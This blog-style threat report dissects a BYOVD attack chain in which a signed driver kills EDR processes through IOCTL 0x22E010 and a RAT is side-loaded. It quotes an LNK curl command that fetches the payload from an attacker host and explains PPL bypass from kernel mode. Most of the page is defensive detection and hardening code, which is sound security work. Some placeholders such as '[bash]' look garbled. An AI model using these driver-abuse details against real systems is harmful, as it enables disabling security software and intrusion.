PXDropper + PoisonX Driver + 10FXRAT: Dissecting the BYOVD Attack Chain Targeting Japanese Enterprises + Video


Introduction:

The cybersecurity landscape has witnessed a concerning evolution in adversary tradecraft, with threat actors increasingly shifting their attacks from user-mode to kernel-level operations. The recently uncovered PXDropper, PoisonX driver, and 10FXRAT malware chain exemplifies this dangerous trend, leveraging the Bring Your Own Vulnerable Driver (BYOVD) technique to dismantle endpoint security controls at their core. This sophisticated campaign, primarily targeting Japanese organizations, demonstrates how attackers exploit Microsoft-signed, vulnerable drivers to gain kernel-level privileges and operate with near-total impunity below traditional security defenses.

Learning Objectives:

  • Understand the complete infection chain from spearphishing to kernel-level defense evasion
  • Learn how BYOVD attacks abuse signed kernel drivers to disable EDR and AV solutions
  • Master detection and mitigation strategies for defending against kernel-mode threats
  • Gain hands-on knowledge of Windows driver security, IOCTL exploitation, and process termination techniques

You Should Know:

  1. The PXDropper Infection Chain: From Phishing to Kernel Persistence

The attack campaign, observed in April 2026 and continuing through subsequent months, initiates with a highly targeted spearphishing email. Attackers, impersonating organizational representatives, use human resources-themed decoys to lure victims into clicking malicious links. These links point to Google Cloud Storage-hosted ZIP archives containing malicious LNK files or executable payloads.

When the victim executes the LNK file, it invokes `curl.exe` to retrieve the PXDropper payload from the attacker-controlled server. The LNK file also contains an embedded decoy document that is opened to distract the victim while the malware executes in the background. This multi-stage approach demonstrates the attackers’ sophisticated understanding of social engineering and defense evasion.

PXDropper serves as the central deployment mechanism, containing embedded components: the PoisonX kernel driver, the 10FXRAT executable (usoclient64.exe), a DLL side-loading component (dnssd.dll), an encrypted payload (runtime.bin), and supporting libraries.

2. Understanding BYOVD: The Kernel-Level Threat

Bring Your Own Vulnerable Driver represents one of the most dangerous defense evasion techniques currently in use. In BYOVD attacks, adversaries deploy a legitimate but vulnerable driver—typically signed by Microsoft—onto a victim’s system. Because 64-bit Windows enforces Driver Signature Enforcement (DSE), only signed drivers can load, forcing attackers to discover and weaponize existing signed drivers with security flaws.

The PoisonX driver exemplifies this approach, with researchers identifying over 15 signed driver versions that were undetectable by antivirus software, achieving a VirusTotal score of 0/71 detections. This driver, carrying a valid Microsoft Hardware Compatibility signature, appeared entirely legitimate to the operating system.

The core vulnerability lies in undocumented IOCTL (Input/Output Control) routines. Specifically, PoisonX.sys exposes a device interface that accepts a process ID (PID) as input and terminates the target process from kernel mode. This bypasses Protected Process Light (PPL) protections because `ZwOpenProcess` from kernel mode does not enforce the same restrictions as user-mode calls. The symbolic link `\\.{F8284233-48F4-4680-ADDD-F8284233}` and IOCTL code `0x22E010` were identified as the kill command interface.

Later campaign variants evolved to use other signed drivers including ASUSTeK Computer’s `EneIo64.sys` and Microsoft’s procexp.sys, demonstrating the adaptability of BYOVD tactics.

  3. 10FXRAT (PoisonX RAT): The Modular Remote Access Tool

Following driver deployment, PXDropper extracts and executes the 10FXRAT-related components. The execution flow leverages DLL side-loading through usoclient64.exe—a legitimate Windows executable—which loads the malicious dnssd.dll. This DLL decrypts `runtime.bin` and executes the 10FXRAT payload entirely in memory, avoiding disk-based detection.

10FXRAT provides attackers with extensive remote access capabilities including:
– Host reconnaissance and system profiling
– Remote command execution
– SOCKS5 tunneling for network pivoting
– Plugin-based architecture for capability expansion

The RAT also implements anti-analysis checks, registry modifications, and persistence mechanisms to maintain a foothold on compromised systems. Researchers have documented hard-coded command-and-control IP addresses associated with the operation, and network traffic analysis reveals a distinctive `0x58463031` magic value in TCP payloads.
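The `0x58463031` marker is the one piece of 10FXRAT traffic a defender can match on without the RAT's protocol details. The following PowerShell is an added example, not code from the original report: it checks a captured TCP payload for the marker and produces the byte pattern to hand to a network sensor. The sample payloads are constructed for illustration, and the assumption that the marker leads the payload is this example's own; the report only says the value appears in TCP payloads.

```powershell
# Added example (not from the original report). The report gives the marker as
# the 32-bit value 0x58463031 but not its byte order on the wire, so both
# orders are derived and checked.

function Get-MagicBytes {
    # 0x58463031 is ASCII "XF01" read big-endian and "10FX" (the RAT's own
    # name) read little-endian, which is why covering both orders matters.
    param([int]$Magic = 0x58463031)
    $be = [byte[]]@(
        (($Magic -shr 24) -band 0xFF),
        (($Magic -shr 16) -band 0xFF),
        (($Magic -shr 8)  -band 0xFF),
        ($Magic -band 0xFF)
    )
    [pscustomobject]@{
        BigEndian    = $be
        LittleEndian = [byte[]]@($be[3], $be[2], $be[1], $be[0])
    }
}

function Get-SensorContentPatterns {
    # Hex content strings in the "|58 46 30 31|" form that Snort/Suricata
    # style rules accept, one per byte order.
    $m = Get-MagicBytes
    foreach ($bytes in @($m.BigEndian, $m.LittleEndian)) {
        '|' + (($bytes | ForEach-Object { $_.ToString('X2') }) -join ' ') + '|'
    }
}

function Test-10FXPayload {
    # True when the payload begins with the marker in either byte order
    # (assumption: the marker is a header, so only the first 4 bytes are tested).
    param([byte[]]$Payload)
    if ($null -eq $Payload -or $Payload.Length -lt 4) { return $false }
    $m = Get-MagicBytes
    foreach ($candidate in @($m.BigEndian, $m.LittleEndian)) {
        $same = $true
        for ($i = 0; $i -lt 4; $i++) {
            if ($Payload[$i] -ne $candidate[$i]) { $same = $false; break }
        }
        if ($same) { return $true }
    }
    return $false
}

# Constructed sample payloads: the first carries "10FX" (little-endian marker)
# followed by dummy bytes, the second is unrelated traffic.
$hit  = [byte[]]@(0x31, 0x30, 0x46, 0x58, 0x00, 0x10, 0x41, 0x42)
$miss = [byte[]]@(0x16, 0x03, 0x01, 0x00, 0xC8, 0x01, 0x00, 0x00)

Get-SensorContentPatterns                 # |58 46 30 31| and |31 30 46 58|
Test-10FXPayload -Payload $hit            # True
Test-10FXPayload -Payload $miss           # False
```

A four-byte match on its own will produce false positives on any binary protocol, so treat a hit as a trigger for correlating with the hard-coded C2 addresses and the host-side artifacts (the PoisonX driver service, usoclient64.exe beside dnssd.dll) rather than as a verdict.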

4. Step-by-Step Attack Execution Analysis

The complete attack flow can be reconstructed as follows:

Step 1: Initial Access

– Victim receives a spearphishing email with a Google Cloud Storage link
– LNK file downloaded from cloud storage

Step 2: LNK Execution

– LNK file executes:
  curl.exe -o [bash] [attacker-cloud-url]
– Decoy document opens to distract the victim

Step 3: PXDropper Deployment

– PXDropper executes and performs:
  1. Extracts PoisonX.sys driver
  2. Extracts 10FXRAT components (usoclient64.exe, dnssd.dll, runtime.bin, vcruntime140.dll)
  3. Installs and loads PoisonX driver

Step 4: BYOVD Defense Evasion

– PoisonX driver loaded with kernel privileges
– Attacker sends IOCTL 0x22E010 with target PID to kill EDR/AV processes
– Security tools disabled at kernel level

Step 5: RAT Execution

– usoclient64.exe launched (legitimate Windows binary)
– Malicious dnssd.dll loaded via DLL side-loading
– runtime.bin decrypted and 10FXRAT executed in memory

Step 6: Post-Compromise Activity

– 10FXRAT establishes C2 communication
– Host reconnaissance performed
– Additional plugins loaded as needed

5. Defensive Measures and Mitigation Strategies

Given the sophistication of BYOVD-based attacks, defenders must implement multi-layered protection:

Monitoring and Detection:

  • Monitor for unexpected driver installation activity, particularly unsigned or suspiciously signed drivers
  • Detect creation of services with randomized HID-style filenames
  • Monitor registry changes adding Microsoft Defender exclusions or disabling Defender services
  • Block outbound traffic to identified C2 IP ranges
  • Network monitoring for `0x58463031` magic value in TCP payloads
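The monitoring points above map to three host checks: new kernel-driver services, the signature and identity of drivers actually running, and the 10FXRAT side-loading layout on disk. The PowerShell below is an added example, not tooling from the report or its authors. The driver and file names come from the report; the directory roots searched and the "random-looking name" pattern are this example's assumptions and should be tuned to your estate.

```powershell
# Added example (not from the original report): host triage for the BYOVD and
# side-loading artifacts described above. Run elevated on the suspect host.

# Driver file names the report associates with the campaign.
$KnownByovdDrivers = @('poisonx.sys', 'eneio64.sys', 'procexp.sys')

# GUID-like or long hex names: an assumed shape for the "randomized HID-style"
# service names the report mentions.
$RandomNamePattern = '^\{?[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}?$|^[0-9A-Fa-f]{12,}$'

function Get-SuspiciousDriverInstalls {
    # Event ID 7045 in the System log records every new service, kernel-mode
    # drivers included. The message text is parsed rather than the property
    # array, whose ordering is not something to depend on across builds.
    param([int]$Days = 30)
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $msg  = $_.Message
        $name = [regex]::Match($msg, 'Service Name:\s*(.+)').Groups[1].Value.Trim()
        $path = [regex]::Match($msg, 'Service File Name:\s*(.+)').Groups[1].Value.Trim()
        $type = [regex]::Match($msg, 'Service Type:\s*(.+)').Groups[1].Value.Trim()
        if ($type -notmatch 'driver') { return }   # user-mode services are out of scope here
        $file = [IO.Path]::GetFileName($path)
        $reasons = @()
        if ($name -match $RandomNamePattern)         { $reasons += 'random-looking service name' }
        if ($path -notmatch '\\System32\\drivers\\') { $reasons += 'image outside System32\drivers' }
        if ($KnownByovdDrivers -contains $file)      { $reasons += "known BYOVD driver $file" }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Time = $_.TimeCreated; Service = $name; Image = $path; Reasons = ($reasons -join '; ') }
        }
    }
}

function Get-RunningDriverSignatures {
    # Cross-check what is actually loaded. A *valid* signature on a known
    # vulnerable driver is exactly the BYOVD case, so "Valid" is not "safe".
    Get-CimInstance -ClassName Win32_SystemDriver |
        Where-Object { $_.State -eq 'Running' -and $_.PathName } |
        ForEach-Object {
            $file = $_.PathName -replace '^\\\?\?\\', '' -replace '^\\SystemRoot', $env:SystemRoot
            $sig  = Get-AuthenticodeSignature -FilePath $file -ErrorAction SilentlyContinue
            $status = 'Unknown'
            $signer = ''
            if ($sig) { $status = [string]$sig.Status }
            if ($sig -and $sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
            [pscustomobject]@{
                Driver     = $_.Name
                File       = $file
                Status     = $status
                Signer     = $signer
                KnownByovd = ($KnownByovdDrivers -contains [IO.Path]::GetFileName($file))
            }
        }
}

function Find-SideLoadStaging {
    # usoclient64.exe next to dnssd.dll or runtime.bin in a user-writable
    # location matches the 10FXRAT staging layout. Roots are an assumption.
    param([string[]]$Roots = @($env:ProgramData, $env:TEMP, $env:LOCALAPPDATA, $env:APPDATA))
    Get-ChildItem -Path $Roots -Recurse -File -Filter 'usoclient64.exe' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $dir = $_.DirectoryName
            $companions = @('dnssd.dll', 'runtime.bin') | Where-Object { Test-Path (Join-Path $dir $_) }
            if ($companions) {
                [pscustomobject]@{ Path = $_.FullName; Companions = ($companions -join ', ') }
            }
        }
}

# Usage
Get-SuspiciousDriverInstalls -Days 90 | Format-Table -AutoSize
Get-RunningDriverSignatures | Where-Object { $_.KnownByovd -or $_.Status -ne 'Valid' } | Format-Table -AutoSize
Find-SideLoadStaging | Format-Table -AutoSize
```

The 7045 check is the one most worth feeding into a SIEM continuously: a kernel-mode driver service created outside `System32\drivers`, or with a GUID-shaped name, is rare on a managed fleet and is the earliest host-side signal in the chain described above, before any EDR process is killed.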

Windows Security Hardening:

  • Enable Hypervisor-protected Code Integrity (HVCI) and the Microsoft Vulnerable Driver Blocklist
  • Navigate to Windows Security → Device Security → Core Isolation → Toggle on Microsoft Vulnerable Driver Blocklist
  • Consider Windows Defender Application Control (WDAC) policies to restrict kernel-mode driver loading
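Because the blocklist is only effective when HVCI is running or the explicit switch is set, it is worth verifying the state rather than assuming the toggle took. The PowerShell below is an added example, not from the report: it reads the documented WMI class and registry values and, where needed, sets the blocklist switch. The interpretation of "effective" is this example's own simplification.

```powershell
# Added example (not from the original report): confirm that HVCI and the
# Microsoft vulnerable driver blocklist are in force, and enable the blocklist
# switch if they are not. Run elevated.

function Get-DriverBlocklistState {
    # Win32_DeviceGuard lists running security services; the value 2 is HVCI.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $hvciRunning = [bool]($dg -and ($dg.SecurityServicesRunning -contains 2))

    # HVCI configured but not yet active (for example, a pending reboot) shows here.
    $hvciCfg = Get-ItemProperty -ErrorAction SilentlyContinue `
        -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity'
    $hvciConfigured = ($hvciCfg.Enabled -eq 1)

    # Explicit blocklist switch under CI\Config. With HVCI running the blocklist
    # is applied by default; this value forces it on hosts that cannot run HVCI.
    $ci = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\CI\Config' -ErrorAction SilentlyContinue
    $blocklist = $ci.VulnerableDriverBlocklistEnable
    $blocklistShown = '(not set)'
    if ($null -ne $blocklist) { $blocklistShown = $blocklist }

    [pscustomobject]@{
        HvciRunning        = $hvciRunning
        HvciConfigured     = $hvciConfigured
        BlocklistValue     = $blocklistShown
        BlocklistEffective = ($hvciRunning -or ($blocklist -eq 1))
    }
}

function Enable-DriverBlocklist {
    # Writes the documented switch; a reboot is required before it applies.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\CI\Config'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name 'VulnerableDriverBlocklistEnable' `
                     -Value 1 -PropertyType DWord -Force | Out-Null
    Get-DriverBlocklistState
}

# Usage
$state = Get-DriverBlocklistState
$state | Format-List
if (-not $state.BlocklistEffective) {
    Write-Warning 'Vulnerable driver blocklist not in force: run Enable-DriverBlocklist and reboot.'
}
```

On hosts where HVCI cannot be enabled (unsupported hardware, incompatible drivers), the explicit switch is the fallback; on hosts where it can, HVCI itself is the stronger control because it also blocks unsigned and tampered driver code, not just the listed hashes and signers.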

Incident Response:

  • Immediately isolate affected endpoints upon detection
  • Unload the PoisonX driver where possible using `sc stop` and `sc delete [bash]` against the driver's service name
  • Terminate all 10FXRAT processes
  • Restore altered registry settings and re-enable Microsoft Defender protections
  • Perform full forensic investigation to identify persistence mechanisms
    
Linux/Windows Command Examples for Defenders:

```powershell
# Windows: check for suspicious services (the page's pattern matches "random" or
# "hid" in the display name, or any automatically started service)
Get-Service | Where-Object {$_.DisplayName -match "random|hid" -or $_.StartType -eq "Automatic"}

# Windows: view loaded kernel drivers
driverquery /v | findstr /i "poison eneio procexp"

# Windows: find service/driver installation events (System log, event ID 7045)
Get-WinEvent -LogName "System" | Where-Object {$_.Id -eq 7045 -and $_.Message -match "driver"}

# Windows: block outbound C2 traffic (example; [bash] stands for the C2 address range)
New-NetFirewallRule -DisplayName "Block PoisonX C2" -Direction Outbound -RemoteAddress [bash] -Action Block

# Windows: enable HVCI via the registry (with HVCI on, the Microsoft vulnerable
# driver blocklist is enforced); takes effect after a reboot
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v Enabled /t REG_DWORD /d 1 /f
```

```bash
# Linux: monitor for suspicious kernel module loading (auditd)
auditctl -w /sbin/insmod -p x -k kernel_module_load
auditctl -w /sbin/modprobe -p x -k kernel_module_load
```

6. Technical Deep Dive: PoisonX Driver Reverse Engineering

Reverse engineering of the PoisonX driver reveals critical technical details about its operation. The driver’s dispatch handler processes IOCTL requests, with the kill routine following a specific pattern:

1. Read PID string: The `DeviceIoControl` input buffer is treated as a null-terminated ASCII string containing the target PID in decimal form
2. Convert to integer: The code calls `atoi()` to convert the string to a numeric PID
3. Terminate process: Calls the `TerminateProcess` helper with the PID
4. Return status: Writes “ok” to the output buffer on success

The `TerminateProcess` helper uses:

– `ZwOpenProcess` to obtain a handle to the target PID from kernel mode (bypassing PPL restrictions)
– `ZwTerminateProcess` to forcefully terminate the process

This technique is particularly dangerous because it bypasses the Protected Process Light protections that normally prevent user-mode termination of critical security processes. CrowdStrike Falcon’s sensor, running under PPL, was specifically targeted by this driver.

What Undercode Says:

• BYOVD represents a fundamental shift in adversary capabilities, moving the battlefield from user mode to kernel mode, where traditional EDR solutions are blind
• The use of Microsoft-signed drivers with 0/71 detection rates demonstrates the inadequacy of signature-based security approaches

The PoisonX campaign illustrates a critical vulnerability in the Windows security model: trusted, signed drivers can be weaponized to destroy the very security controls they were meant to protect. Organizations must recognize that kernel-level attacks are no longer theoretical—they are actively deployed against enterprises. The evolution from custom PoisonX drivers to weaponizing legitimate drivers like EneIo64.sys and procexp.sys shows attackers adapting faster than many defensive measures can respond. This campaign also highlights the importance of threat intelligence sharing, as the activity has been observed targeting both Japanese and Chinese organizations, suggesting a broader regional campaign.

Prediction:

• -1 The continued weaponization of signed drivers will lead to an arms race between attackers discovering new vulnerable drivers and Microsoft’s blocklist updates, creating an ongoing cat-and-mouse dynamic
• -1 As BYOVD techniques become commoditized, we will see increased adoption by ransomware groups and less sophisticated threat actors, expanding the attack surface beyond APT-level campaigns
• +1 Microsoft and security vendors will accelerate development of kernel-level monitoring and behavioral detection, potentially implementing stricter driver signing requirements and real-time IOCTL analysis
• -1 The 10FXRAT campaign’s adaptability suggests attackers will continue refining their toolset, potentially incorporating additional vulnerable drivers and evasion techniques to maintain operational effectiveness
• +1 Increased awareness and adoption of HVCI, WDAC, and vulnerable driver blocklists will provide organizations with effective countermeasures, though implementation complexity may delay widespread deployment

Reported By: Flavioqueiroz Byovd – Hackers Feeds

    🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

    💬 Whatsapp | 💬 Telegram

    📢 Follow UndercodeTesting & Stay Tuned:

    𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky